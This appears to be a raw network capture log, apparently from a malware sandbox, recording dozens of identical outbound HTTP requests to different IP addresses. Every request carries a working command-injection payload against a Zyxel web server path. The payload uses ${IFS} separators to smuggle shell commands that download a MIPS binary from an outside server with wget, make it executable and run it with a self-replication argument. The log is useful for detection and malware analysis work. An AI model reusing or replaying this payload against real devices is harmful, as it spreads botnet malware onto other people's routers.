                                                        Feb 2, 2024 06:21:00.748379946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2216192.168.2.145613663.147.206.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748410940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2217192.168.2.1452566122.117.146.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748434067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2218192.168.2.1455126190.14.102.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748473883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2219192.168.2.144121899.176.189.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748529911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2220192.168.2.1432838113.63.138.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748558998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2221192.168.2.1447308113.169.225.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748595953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2222192.168.2.144080623.248.231.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748646021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2223192.168.2.144555823.141.131.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748692036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2224192.168.2.143854861.1.244.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748732090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2225192.168.2.1452132104.1.62.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748764992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2226192.168.2.144095238.65.181.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748794079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2227192.168.2.144043819.147.191.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748850107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2228192.168.2.1455316100.58.80.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748900890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2229192.168.2.145782817.70.154.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748940945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2230192.168.2.1457838118.16.42.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748969078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2231192.168.2.1458838206.178.247.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749022007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2232192.168.2.1452342176.216.43.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749078989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2233192.168.2.1455064100.173.93.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749104977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2234192.168.2.144870671.25.150.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749155045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2235192.168.2.1443030208.3.3.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749207973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2236192.168.2.145459250.15.0.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749238968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2237192.168.2.1455304222.10.88.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749295950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2238192.168.2.145003234.125.9.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749341965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2239192.168.2.144835273.43.254.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749383926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2240192.168.2.1454414161.249.221.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749414921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2241192.168.2.1454336107.49.185.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749450922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2242192.168.2.1459058157.226.180.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749486923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2243192.168.2.1446110102.127.239.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749530077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2244192.168.2.1450276194.155.95.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749564886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2245192.168.2.1453196198.228.173.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749614000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2246192.168.2.1446244172.90.24.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749643087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2247192.168.2.1445772205.8.114.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749699116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2248192.168.2.1438080158.53.141.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749717951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2249192.168.2.145815860.106.209.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749754906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2250192.168.2.145560462.12.121.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749794006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2251192.168.2.1435066115.29.185.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749838114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2252192.168.2.1434016210.54.143.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749871969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2253192.168.2.1455374185.202.193.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749893904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2254192.168.2.145789259.208.75.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749927998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2255192.168.2.1454744174.143.150.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.749979973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2256192.168.2.1451082123.16.52.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750024080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2257192.168.2.1452616152.95.167.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750073910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2258192.168.2.144678035.146.51.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750111103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2259192.168.2.1447260117.119.166.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750144958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2260192.168.2.144697652.216.41.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750174046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2261192.168.2.1438796175.46.56.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750226021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2262192.168.2.1457710205.2.176.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750278950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2263192.168.2.1451486117.83.209.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750322104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2264192.168.2.144998436.8.149.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750370979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2265192.168.2.1459982119.245.137.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750396013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2266192.168.2.1452162223.110.121.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750437021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2267192.168.2.1437718220.157.141.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750484943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2268192.168.2.1443636203.37.97.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750529051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2269192.168.2.1455828209.95.47.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750569105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2270192.168.2.144633219.237.218.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750595093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2271192.168.2.145424271.211.29.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750648975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2272192.168.2.144842224.108.232.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750685930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2273192.168.2.1457348151.235.225.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750734091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2274192.168.2.1433644131.118.131.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750777006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2275192.168.2.145878641.117.252.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750804901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2276192.168.2.146072431.195.247.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750852108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2277192.168.2.1451244198.220.176.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.750888109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2278192.168.2.144347667.5.205.243443
                                                        TimestampBytes transferredDirectionData
